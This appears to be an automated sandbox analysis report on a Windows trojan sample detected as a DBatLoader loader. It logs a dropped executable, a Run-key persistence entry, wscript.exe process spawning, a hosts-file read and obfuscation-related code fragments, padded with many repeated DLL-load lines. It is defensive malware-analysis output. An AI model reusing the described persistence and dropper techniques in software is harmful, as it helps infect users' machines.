Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll

Source: SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	ReversingLabs: Detection: 15%
Source: SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Virustotal: Detection: 30%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\wscript.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\Public\Libraries\Iuigzwjd.exe "C:\Users\Public\Libraries\Iuigzwjd.exe"
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\wscript.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\Public\Libraries\Iuigzwjd.exe "C:\Users\Public\Libraries\Iuigzwjd.exe"
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\wscript.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\wscript.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\Public\Libraries\Iuigzwjd.exe "C:\Users\Public\Libraries\Iuigzwjd.exe"	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\wscript.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\wscript.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@10/5@2/2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

Code function: 0_2_0272823A GetDiskFreeSpaceA,

0_2_0272823A

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

Code function: 0_2_02735770 CreateToolhelp32Snapshot,

0_2_02735770

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: SysTabControl32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:	Binary string: explorer.pdbUGP source: wscript.exe, 00000001.00000002.572034695.0000000005D50000.00000040.00000001.00040000.00000000.sdmp
Source:	Binary string: wscript.pdbGCTL source: explorer.exe, 00000002.00000002.591545525.0000000015563000.00000004.00000001.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: wscript.exe, 00000001.00000003.277522589.0000000004D22000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.279077303.0000000004EBD000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: wscript.exe, wscript.exe, 00000001.00000003.277522589.0000000004D22000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.279077303.0000000004EBD000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wscript.pdb source: explorer.exe, 00000002.00000002.591545525.0000000015563000.00000004.00000001.00040000.00000000.sdmp
Source:	Binary string: explorer.pdb source: wscript.exe, 00000001.00000002.572034695.0000000005D50000.00000040.00000001.00040000.00000000.sdmp

Data Obfuscation

Yara detected DBatLoader

Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe.2720000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe.2a2eed8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe.2a2eed8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.278011909.0000000002520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.278530431.0000000002A2E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_0273F2A4 push 0273F310h; ret	0_2_0273F308
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_0273F0AC push 0273F125h; ret	0_2_0273F11D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_0273F144 push 0273F1ECh; ret	0_2_0273F1E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_0273F1F8 push 0273F288h; ret	0_2_0273F280
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_0272C718 push ecx; mov dword ptr [esp], edx	0_2_0272C71D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_0272D78C push 0272D7B8h; ret	0_2_0272D7B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_027384FC push 02738554h; ret	0_2_0273854C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_027344AC push 027344EEh; ret	0_2_027344E6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_02735488 push 027354F2h; ret	0_2_027354EA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_027265FA push 02726657h; ret	0_2_0272664F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_027265FC push 02726657h; ret	0_2_0272664F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_027335A6 push 02733653h; ret	0_2_0273364B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_027335A8 push 02733653h; ret	0_2_0273364B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_02726A48 push 02726A8Ah; ret	0_2_02726A82
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_02723894 push eax; ret	0_2_027238D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_0272CE1C push 0272CFA2h; ret	0_2_0272CF9A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_0272FEA0 push 0272FF16h; ret	0_2_0272FF0E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_0272FFA3 push 0272FFF1h; ret	0_2_0272FFE9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_0272FFA4 push 0272FFF1h; ret	0_2_0272FFE9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_0273EC64 push 0273EE54h; ret	0_2_0273EE4C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_02738C58 push ecx; mov dword ptr [esp], edx	0_2_02738C5D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_0272CD93 push 0272CFA2h; ret	0_2_0272CF9A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0599D0D1 push ecx; ret	1_2_0599D0E4

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

Code function: 0_2_02736388 InetIsOffline,VirtualAlloc,GetProcAddress,FreeLibrary,VirtualAlloc,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualAlloc,VirtualProtect,FreeLibrary,

0_2_02736388

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

File created: C:\Users\Public\Libraries\Iuigzwjd.exe

Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Iuigzwjd			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Iuigzwjd			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

Code function: 0_2_027354F4 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_027354F4

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX	Jump to behavior
